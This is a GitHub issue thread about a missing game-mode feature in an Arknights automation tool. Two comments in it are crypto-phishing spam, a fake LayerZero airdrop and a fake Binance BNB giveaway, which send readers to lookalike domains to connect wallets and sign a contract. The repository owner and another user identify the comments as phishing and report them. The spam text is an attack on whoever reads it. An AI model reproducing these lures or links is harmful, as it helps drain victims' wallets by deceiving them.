### ISSUE TITLE
殲滅作戦モードサポート

### ISSUE THREAD

**Issue by data-miner00** [data-miner00/arknights-event-afk#1]
今は殲滅作戦のオペレーションは引き続き実行できません。ほかのモードは大丈夫です。

**Comment by vokaplok** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @liam0x, @agausmann, @rusproject, @UdjinM6, @MatthewTeta, @ad184hl, @tsycnh, @oncefrom, @NinjaCross, @Jackneill, @DevistK, @windo-developer, @didier, @DevanshUpadhyay26, @anatolinicolae, @gmh5225, @jdherg, @jamesfg88, @Th31ar, @osborne6, @wonderlandpark, @elvisdare07, @hassnian, @parshav, @Mateiadrielrafael, @yejooni, @rohanthacker, @haneyume, @hijoe320, @cheng10, @panthurrr, @my3L, @com03240, @Piorosen, @BU1V0L, @dustineichler, @ElliotOne, @kanayuki, @Uj947nXmRqV2nRaWshKtHzTvckUUpD, @kunatastic, @testrDEV, @julianoviedo1, @nickdevereaux, @Serpenticide, @MMetz96, @Vheissu, @komen205, @lsglucas, @xcmy, @mo-karam

**Comment by data-miner00** [comment]
Seriously? I'm reporting these phishing notification email to GitHub

**Comment by prescientmoon** [comment]
> Seriously? I'm reporting these phishing notification email to GitHub

Same, I also reported it

**Comment by data-miner00** [comment]
Do not click on any of those links from the issue/email itself!
